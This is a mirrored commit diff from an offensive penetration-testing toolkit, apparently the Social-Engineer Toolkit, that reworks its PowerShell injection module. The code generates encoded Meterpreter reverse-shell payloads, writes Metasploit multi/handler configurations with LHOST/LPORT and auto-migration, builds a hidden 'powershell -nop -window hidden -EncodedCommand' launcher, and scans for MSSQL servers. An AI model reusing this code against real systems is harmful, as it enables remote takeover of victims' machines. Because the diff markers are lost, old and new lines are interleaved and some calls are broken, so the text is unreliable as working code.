mirror of
synced 2025-03-03 06:47:31 +00:00
multiple fixes for powershell injection
This commit is contained in:
9 changed files with 206 additions and 187 deletions
@ -1,3 +1,10 @@
version 7.3.7
* replaced powershell prep with the old one - it broke almost all powershell injection in SET
* fixed an issue that would cause scanner to continue to scan even when port not discovered (function issue)
version 7.3.6
@ -113,8 +113,8 @@ try:
for ip in range1:
sqlport = get_sql_port(ip)
if sqlport == None:
if sql_nmap_scan != "":
nmapscan = sql_nmap_scan(ip)
if nmapscan != "":
sql_servers = sql_servers + \
ip + ":" + "1433" + ","
@ -10,7 +10,6 @@ import base64
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
from src.payloads.powershell.prep import prep_powershell_payload
if len(check_options("IPADDR=")) > 2:
@ -600,7 +599,10 @@ try:
if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
import src.payloads.powershell.prep
if os.path.isfile("%s/x86.powershell" % (setdir)):
fileopen1 = open(
"%s/x86.powershell" % (setdir), "r")
@ -1 +1 @@
@ -1762,7 +1762,7 @@ def get_sql_port(host):
# Build the socket with a .1 second timeout
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Attempt to query UDP:1434 and return MSSQL running port
@ -8,7 +8,6 @@ import subprocess
import time
import src.core.setcore as core
import impacket.tds as tds
from src.payloads.powershell.prep import prep_powershell_payload
#from src.core.payloadgen import create_payloads
@ -173,7 +172,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
if choice1 == "1":
web_path = None
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
@ -245,20 +245,20 @@ def deploy_hex2binary(ipaddr, port, username, password):
filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
# core.module_reload(src.payloads.powershell.prep)
# import src.payloads.powershell.prep
import src.payloads.powershell.prep
# launch powershell
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
#with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = file(core.setdir + "x86.powershell").read()
x86 = file(core.setdir + "x86.powershell").read().rstrip()
# x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
@ -8,7 +8,6 @@ import os
import subprocess
import src.core.setcore as core
from src.payloads.powershell.prep import prep_powershell_payload
# Py2/3 compatibility
# Python3 renamed raw_input to input
@ -75,7 +74,12 @@ try:
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
@ -1,201 +1,203 @@
#!/usr/bin/env python
# coding=utf-8
import os
import sys
import subprocess
import re
import os
import time
from src.core.setcore import *
import src.core.setcore as core
# grab stage encoding flag
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
stage_encoding = "true"
# Py2/3 compatibility
# Python3 renamed raw_input to input
input = raw_input
except NameError:
# check to see if we are just generating powershell code
powershell_solo = check_options("POWERSHELL_SOLO")
def prep_powershell_payload():
# check if port is there
port = check_options("PORT=")
# grab stage encoding flag
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
# check if we are using auto_migrate
auto_migrate = check_config("AUTO_MIGRATE=")
# check if we are using pyinjection
pyinjection = check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(setdir + "/payload_options.shellcode"):
pyinjection = "on"
"Multi/Pyinjection was specified. Overriding config options.")
stage_encoding = "true"
pyinjection = "off"
# check to see if we are just generating powershell code
powershell_solo = core.check_options("POWERSHELL_SOLO")
# grab ipaddress
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
# check if port is there
port = core.check_options("PORT=")
# check to see if we are using multi powershell injection
multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower()
# check if we are using auto_migrate
auto_migrate = core.check_config("AUTO_MIGRATE=")
# turn off multi injection if pyinjection is specified
if pyinjection == "on":
multi_injection = "off"
# check if we are using pyinjection
pyinjection = core.check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
pyinjection = "on"
core.print_status("Multi/Pyinjection was specified. Overriding config options.")
pyinjection = "off"
# check what payloads we are using
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
# grab ipaddress
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
ipaddr = input("Enter the ipaddress for the reverse connection: ")
core.update_options("IPADDR=" + ipaddr)
# if we specified a hostname then default to reverse https/http
if validate_ip(ipaddr) == False:
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# check to see if we are using multi powershell injection
multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()
# turn off multi injection if pyinjection is specified
if pyinjection == "on":
multi_injection = "off"
# check what payloads we are using
powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
# if we specified a hostname then default to reverse https/http
if not core.validate_ip(ipaddr):
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
# if we have multi injection on, don't worry about these
if multi_injection != "on":
if pyinjection == "off":
"POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443"
with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen:
data = fileopen.read()
fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set LPORT {2}\n"
"set EnableStageEncoding {3}\n"
"set ExitOnSession false\n"
"exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))
filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" %
(powershell_inject_x86, ipaddr, port, stage_encoding))
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
# if we have multi injection on, don't worry about these
if multi_injection != "on":
if pyinjection == "off":
# check to see if the meta config multi pyinjector is there
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if port.options isnt there then prompt
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
# turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON":
multi_injection = "off"
pyinjection = "on"
# turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON":
multi_injection = "off"
pyinjection = "on"
# if we are using multi powershell injection
if multi_injection == "on" and pyinjection == "off":
core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
# if we are using multi powershell injection
if multi_injection == "on":
if pyinjection == "off":
"Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x86 = ""
# define a base variable
x86 = ""
# specify a list we will use for later
# specify a list we will use for later
multi_injection_x86 = ""
# here we do some funky loops so we don't need to rewrite the code below
if multi_injection == "on":
port = check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports != "":
"Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + \
powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
port_check = check_ports(
"%s/meta_config_multipyinjector" % (setdir), ports)
if port_check == False:
filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
# if we aren't using multi pyinjector
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/meta_config" % (setdir)):
filewrite = open("%s/meta_config" % (setdir), "w")
port_check = check_ports("%s/meta_config" % (setdir), ports)
if port_check == False:
filewrite = open("%s/meta_config" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
multi_injection_x86 = ""
# here we do some funky loops so we don't need to rewrite the code below
if multi_injection == "on":
port = core.check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports:
core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports))
multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports)
if not port_check:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding {2}\n"
"set LPORT {3}\n"
"set ExitOnSession false\n"
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
# if we aren't using multi pyinjector
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if meta config isn't created yet then create it
if not os.path.isfile():
with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite:
port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports)
if not port_check:
with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding {2}\n"
"set ExitOnSession false\n"
"set LPORT {3}\n"
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
injections = []
# read in the file we need for parsing
with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",")
# read in the file we need for parsing
fileopen = open(setdir + "/payload_options.shellcode", "r")
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",")
# format: payload<space>port
for payload in payloads:
# format: payload<space>port
for payload in payloads:
# format: payload<space>port
payload = payload.split(" ")
powershell_inject_x86 = payload[0]
port = payload[1]
core.print_status("Generating x86-based powershell injection code...")
injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86))
multi_injection_x86 = ",".join(injections)
payload = payload.split(" ")
powershell_inject_x86 = payload[0]
port = payload[1]
print_status("Generating x86-based powershell injection code...")
multi_injection_x86 = multi_injection_x86 + "," + \
powershell_inject_x86, ipaddr, port, x86)
# if its turned to off
if multi_injection == "off" and pyinjection == "off":
core.print_status("Generating x86-based powershell injection code...")
x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
# if its turned to off
if multi_injection == "off":
if pyinjection == "off":
print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection
if multi_injection == "on" or pyinjection == "on":
x86 = multi_injection_x86[1:] # remove comma at beginning
# if we are specifying multi powershell injection
if multi_injection == "on" or pyinjection == "on":
x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user
verbose = core.check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on":
core.print_status("Printing the x86 based encoded code...")
# check to see if we want to display the powershell command to the user
verbose = check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on":
print_status("Printing the x86 based encoded code...")
#with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
filewrite = open(core.setdir + "/x86.powershell", "w")
core.print_status("Finished generating powershell injection bypass.")
core.print_status("Encoded to bypass execution restriction policy...")
filewrite = open("%s/x86.powershell" % (setdir), "w")
print_status("Finished generating powershell injection bypass.")
print_status("Encoded to bypass execution restriction policy...")
@ -12,7 +12,6 @@ import subprocess
import src.core.setcore as core
from src.core.menu import text
from src.payloads.powershell.prep import prep_powershell_payload
# Py2/3 compatibility
# Python3 renamed raw_input to input
@ -43,7 +42,12 @@ if powershell_menu_choice != "99":
with open(core.setdir + "/payload_options.shellcode", "w") as filewrite:
filewrite.write("windows/meterpreter/reverse_tcp {},".format(port))
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"):
Add table
Reference in a new issue